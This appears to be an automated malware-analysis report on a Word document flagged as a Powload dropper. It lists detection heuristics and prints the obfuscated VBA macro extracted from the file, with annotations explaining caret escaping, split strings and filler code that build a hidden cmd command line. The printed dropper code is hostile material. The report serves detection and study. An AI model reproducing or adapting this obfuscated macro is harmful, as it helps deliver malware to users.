Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7e29e12f084bcb9a…

MALICIOUS

Office (OLE)

86.2 KB · Created: 2018-08-28 22:37:00 · Authoring application: Microsoft Office Word · First seen: 2019-01-11
MD5: 4ee7507eee527aff1a84799997b8f4d4 SHA-1: da3c1adf2f8db3ccacf0b8a676b7b99142a7d324 SHA-256: 7e29e12f084bcb9a38f922c452338e06a41407367a22c501a679b74780677282
Risk score: 202

Heuristics 6

  • ClamAV: Doc.Dropper.Powload-6922834-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Powload-6922834-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    The extracted VBA macro code contains a call to Shell()
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    The VBA project contains an AutoOpen macro, an auto-execution entry point that runs when the document is opened
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of a legacy Word macro execution surface; by itself it is not a downloader or parser-CVE attribution.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8120 bytes
SHA-256: 46800935e5e383557a111879625240b51560fae8ce3ec98ca8b7c93825cd6d04
Preview script
First 1,000 lines of the extracted script
' VBA module attributes as they appear in the source decoded by
' oletools.olevba.extract_macros. VB_Name is the module's name; the
' VB_Base = "1Normal.ThisDocument" / VB_PredeclaredId / VB_Exposed
' combination is consistent with a document-level ThisDocument class
' module rather than a standalone code module.
Attribute VB_Name = "JaGDchvzVm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' A second VB_Name with no other attributes: the extractor appears to
' have concatenated a second module's source after the first. The
' functions that follow (BrXdNCmR, lWRpZ) belong to this second module.
Attribute VB_Name = "qziWUiTLh"
' Builds and returns one long command-line string from twelve short
' string fragments held in locals (CzzCmpY .. wfJmnhROG) and joined at
' the end. Nothing is executed inside this function; whatever consumes
' the return value (the report flags a Shell() call elsewhere in the
' macro) is outside this function and cannot be confirmed from here.
'
' Reading notes for analysts:
'  * On Error Resume Next suppresses every runtime error in the function.
'  * The bare "Hour expr" statements call the Hour() function and discard
'    its result. Their operands are never assigned in this function, so
'    these lines contribute nothing to the return value and read as
'    filler inserted to pad and obfuscate the routine.
'  * Chr(2 + 3 + 4 + 5 + 20) is Chr(34), a double quote, so the assembled
'    text begins  md /V:/C"  — the leading "c" of "cmd" is not produced
'    here; presumably prepended by the caller (not verifiable from this
'    function alone).
'  * The "^" characters are consistent with cmd.exe caret escaping; with
'    the carets removed the first fragment continues as  set KuS=  and
'    the remaining fragments are base64-like text. What that text decodes
'    to cannot be determined from this function.
'  * Splitting the string into many short literals is consistent with
'    string-splitting obfuscation aimed at defeating simple signatures.
Function BrXdNCmR()

' Error suppression: any failure below is silently ignored.
On _
Error _
Resume _
Next
' Filler: Hour() called for effect-free, discarded results (see header).
Hour 91408 * lPOzPD * 56504 * ttUsp
   Hour CvlbG * SwcPaM / 204 * LCjGO
' Fragment 1: "md /V:/C" + Chr(34) + caret-escaped "set KuS=" prefix.
CzzCmpY = "md /V:" + "/" + "C" + Chr(2 + 3 + 4 + 5 + 20) + "^s^" + "e^t ^K" + "^u^S=^" + "A" + "^" + "ACA" + "^"
Hour wvkwPR * uGStwH / 2952 / ipvSQ
   Hour pqdCiq * maOLYw * qHVAHi / 17733
' Fragment 2.
PhmkfcHKnj = "g^A^AI^" + "A^AC" + "A^g" + "^A^AI" + "A^ACA" + "^g" + "^AA" + "^" + "IAAC" + "^" + "A"
Hour MJpwR * swrNG * VMjAGU / 83890
   Hour 51787 * onYWvV
   Hour jDXrhZ / JDahY / qYBqUG * Pjkjw
   Hour RGcoQ * RcGRGk
' Fragment 3.
fTzKI = "^g^A" + "A^IA^A" + "C^A^" + "gAAI" + "AAC^A^g" + "^" + "A" + "Q^" + "fA" + "^0HA"
Hour 31063 / kJWDS
   Hour 90171 / QzCblR / 70708 / OSkjj
' Fragment 4.
OjhVMEK = "^7BAa^" + "AM" + "^GA" + "^0^B^Q" + "Y^A^M^" + "GA9" + "^Bw^O" + "As^GA"
Hour 53165 / zLarnH / 15038 * ofivZ
   Hour AiqwEV * aSOIJW
   Hour 46791 / PBNTB
   Hour LqdbkN / HlmHs * 28685 * QYOuLU
   Hour CdsuO / lGModG * tiTqi * DoEfPs
' Fragment 5.
vvJbpr = "^hB" + "^Q^ZAIH" + "^AiB^" + "wO" + "AkGA^U" + "B^QVA^Q" + "C^A" + "^gA^Q^b" + "AU^GA^0" + "^B^Q^S^" + "A" + "^0"
Hour hYYfw * dBjYiq
   Hour KFjGil * friJi / AkVCS * zfucL
   Hour 4961 * 10516 / PfqnPr / CdPGJ
' Fragment 6.
JiuCqN = "CA^l" + "B^w^a^" + "A8GA^" + "2^B^g^b" + "^Ak" + "E^" + "A7A^Q" + "KAk^G^" + "A^U^B^Q" + "VAQC^"
Hour 62713 / WTlcRN * MVNvP * VRffLQ
   Hour VOUwhs / LMtdOl
   Hour 40985 / cXBIi
' Fragment 7.
nfPTBaBwF = "A" + "^g^A^A" + "L" + "^A0^E" + "^A" + "^3" + "^" + "B^wV^A^" + "QCAo^A" + "^Q^ZAwG" + "^A^p^" + "BgR" + "^"
Hour 91617 * 76878
   Hour 93894 * jYdKhd / 73633 / cCLaEX
   Hour 68013 / sunpQ
   Hour 15407 * adslUw / FQfjU * AIURBr
   Hour 92235 * CnODN / 5946 / ZIIkn
' Fragment 8.
zUzWjtrE = "A^" + "Q^G^" + "A^" + "h" + "B^wb^" + "A" + "^"
Hour 94163 / rXbjwQ * SZHEq * PGzhfj
   Hour 62316 * WaIlYJ
   Hour 40193 / 57710 / 3218 / YIZNwb
' Fragment 9.
kKPnUjrIO = "w^" + "G" + "^" + "A^u^B^w" + "d" + "A" + "^8G^A" + "^EB" + "g^L" + "^Ak^"
Hour DidlW / UEpkBE
   Hour 92712 * AbLrQ * FdCwH / jmkEW
' Fragment 10.
Jzctj = "G^A^q" + "B^gV^A" + "QC^A7B" + "Q^eAI^" + "HA0B^w" + "^eA^kC^" + "A" + "y^" + "Bw^d^A" + "^M" + "^E^A^k"
Hour rwXObo * ftznNL
   Hour 23404 / QVVtw
' Fragment 11.
OFlMKujGTH = "^A^AI^A" + "4" + "G^" + "A^pB^" + "A" + "I^A^0" + "^EA^" + "3B^w" + "V"
Hour 74501 * pnREj / 60539 / tEIEDw
   Hour 52403 * ZjCKtu
' Fragment 12.
wfJmnhROG = "^A" + "Q" + "C^A^o^" + "A^A^a^A" + "M^G^" + "AhBQZA^" + "IH^Av"
' Return value: all twelve fragments joined in order. The trailing Hour
' lines run after the assignment and do not alter it.
BrXdNCmR = CzzCmpY + PhmkfcHKnj + fTzKI + OjhVMEK + vvJbpr + JiuCqN + nfPTBaBwF + zUzWjtrE + kKPnUjrIO + Jzctj + OFlMKujGTH + wfJmnhROG
   Hour nAlYt / VkzmBb
   Hour UqUHQ / 14714 * 34493 / 38391
End Function
Function lWRpZ()

On _
Error _
Resume _
Next
Hour 32641 * RYbVu / 62297 * psiLUL
   Hour 38187 / avqIw * pYsYk * MqsmK
   Hour 67922 / zdaAw * iTZnr * 36203
   Hour 38108 * rHUZwI * rUjlVp * zwwYwW
mVSfYDdZA = "B" + "gZAs" + "^D" + "AnAQZ" + "^Ag^H^"
Hour 10729 / MAsoZ
   Hour 86607 / wzRYrt * GAjjfL / wEMnFF
   Hour CqOwOu * TXQwdt / TvUzOf / oCaFT
ZVXLS = "A^l^" + "Bg^" + "LA" + "cC^ArAA" + "^Z^A^" + "8^G" + "A^3" + "BA^J^" + "A" + "^sCAn^A" + "A^X^Ac"
Hour mlnIKv * JsfkJj / SjhzV * RSIqFi
   Hour 87735 / oYnaM
   Hour otvqIs * fIVjfs
   Hour SiWdij * YTiDKT / 56180 * CfhmVz
saYIAzpsFHw = "CAr^A^w" + "^Y" + "^Ak" + "G^AsB^g" + "^Y^AUHA" + "^w^" + "B^g^O^A" + "Y^H^"
Hour jqpMjA * EzVbIF * QCLSDw / PchkV
   Hour wQLDs * idnkT / 59709 * hYiIlv
TKfzkiJIQ = "Au" + "B^Q^ZA" + "^QC" + "A^" + "9^AQ" + "a" + "A^Q^F^" + "AV^"
Hour 71736 / tMrlQ
   Hour jzzcp / ZjcoNX * 6197 / Mowwj
   Hour ABVWn / nqMZQi / ocfzfq * PVqXjS
   Hour 15237 / OLdIjJ / PuEnO * zYAYrz
   Hour 98957 * izKBSq / ZNPfI * TUZsV
MBuiHosLlMz = "B^A^J^A" + "^s" + "D" + "^An^A" + "gNAM^" + "DA0^A" + "w" + "^J^" + "AACA9A" + "^"
Hour bMiCGi * znVzi
   Hour antwO / 92075 / JRTiE / BYmli
OkTtmWHq = "A^
... (truncated)